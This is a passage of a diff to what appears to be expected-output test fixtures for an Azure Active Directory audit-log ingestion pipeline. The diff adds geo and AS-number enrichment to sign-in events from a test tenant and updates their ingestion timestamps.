Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3e17bf8e-92de-45b6-b668-7618ab0e0c95\",\"InterSystemsId\":\"b5c5fd00-b659-413e-8739-6271a4d70506\",\"IntraSystemId\":\"fabbe34e-a6dd-46f8-805f-4ca633c2ae00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -6770,6 +7454,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ 
@@ -6850,7 +7546,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970366400Z", + "ingested": "2021-12-14T14:49:08.047449362Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:52:06\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"f100d714-ffa2-4077-bf90-2f57a3b366c0\",\"InterSystemsId\":\"b744259e-13e0-43d7-9f56-82cdbd54cf7c\",\"IntraSystemId\":\"ce9f104d-1a1b-488e-9313-b9729e99c400\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -6890,6 +7586,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.14" }, "tags": [ @@ -6970,7 +7678,7 @@ "ip": "67.43.156.14" }, "event": { - "ingested": "2021-12-09T13:42:12.970372200Z", + "ingested": "2021-12-14T14:49:08.047449825Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.14\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.14\",\"CreationTime\":\"2020-02-08T14:33:50\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"4b0f0d57-0766-4621-8aa0-04b8d8b63a78\",\"InterSystemsId\":\"b7d9a234-9fdd-4e36-9cf3-fd825f22697a\",\"IntraSystemId\":\"49092519-a590-4207-b1b3-1d49f9100a00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -7010,6 +7718,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -7090,7 +7810,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970377900Z", + "ingested": "2021-12-14T14:49:08.047450343Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:38\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"8d9a1fa8-7b85-4c5d-9e96-5728d572fb95\",\"InterSystemsId\":\"bb677f9e-953a-4bde-bb91-0ef8209200a1\",\"IntraSystemId\":\"1da3c318-642f-48dc-836b-e83b27655b00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -7130,6 +7850,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -7210,7 +7942,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970383500Z", + "ingested": "2021-12-14T14:49:08.047450811Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:44:05\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"9756fe5b-ea0d-42fa-a665-be8e0eb100e5\",\"InterSystemsId\":\"c355f078-53d7-4d60-b836-851a09a98208\",\"IntraSystemId\":\"20e56367-e902-4200-855b-2ef7b99e5f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -7250,6 +7982,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -7330,7 +8074,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970389Z", + "ingested": "2021-12-14T14:49:08.047451272Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:28:51\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"abbf584f-b3a9-4b6d-9b37-4cc4b802ca4d\",\"InterSystemsId\":\"c5874ff2-7c53-4d51-9252-7abbf0524b1c\",\"IntraSystemId\":\"3188aef9-6b4e-44f2-8455-c28b49552200\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -7370,6 +8114,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -7450,7 +8206,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970394600Z", + "ingested": "2021-12-14T14:49:08.047451750Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:25:21\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"d137a5e4-7004-493a-acca-5fb167d1f207\",\"InterSystemsId\":\"cf2168a1-6537-4ed6-80a5-797c3458180c\",\"IntraSystemId\":\"23f53edd-63a7-4292-9d80-4fbc49c11e00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -7490,6 +8246,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -7570,7 +8338,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970400300Z", + "ingested": "2021-12-14T14:49:08.047452221Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:20\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"73f0a2ef-35be-4a71-9545-59d879fc8fb2\",\"InterSystemsId\":\"d21f6867-0670-4c94-b6fa-bde326fcf3c6\",\"IntraSystemId\":\"1fa4819f-605a-4ebe-a2c3-bc11c3f8e200\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -7610,6 +8378,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -7690,7 +8470,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970406Z", + "ingested": "2021-12-14T14:49:08.047452791Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:44:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"3783acda-5ded-4d69-95b6-3df5344c0ce0\",\"InterSystemsId\":\"d5effb7f-9d39-4893-90f6-9cfeec7ed1a7\",\"IntraSystemId\":\"f22a3ad7-22e7-4296-a600-e4e9161a6000\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -7730,6 +8510,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -7810,7 +8602,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970433700Z", + "ingested": "2021-12-14T14:49:08.047453251Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:44:03\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"f67568b1-64c4-4165-bdd9-16a5b9142eef\",\"InterSystemsId\":\"d960e058-1adb-4a84-a65b-1a6ce367e323\",\"IntraSystemId\":\"1dfdb693-18a1-4cff-aa3e-61feaa356100\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -7850,6 +8642,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -7930,7 +8734,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970437800Z", + "ingested": "2021-12-14T14:49:08.047453712Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:29:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"a8114a24-d342-4689-b75e-51e6386763de\",\"InterSystemsId\":\"e2565aaf-91b0-4ccd-8810-743123eb7383\",\"IntraSystemId\":\"21166e08-6589-4c2d-a325-c97ba45f2200\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -7970,6 +8774,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -8050,7 +8866,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970442700Z", + "ingested": "2021-12-14T14:49:08.047454193Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:25:21\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"1eaf9c65-8c67-4cd9-9277-771589113752\",\"InterSystemsId\":\"ede626b9-2035-4d02-8330-201c4ae82af6\",\"IntraSystemId\":\"98612804-9aa6-40a4-b72a-808bc7742000\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -8090,6 +8906,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -8170,7 +8998,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970447700Z", + "ingested": "2021-12-14T14:49:08.047454644Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:39\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) 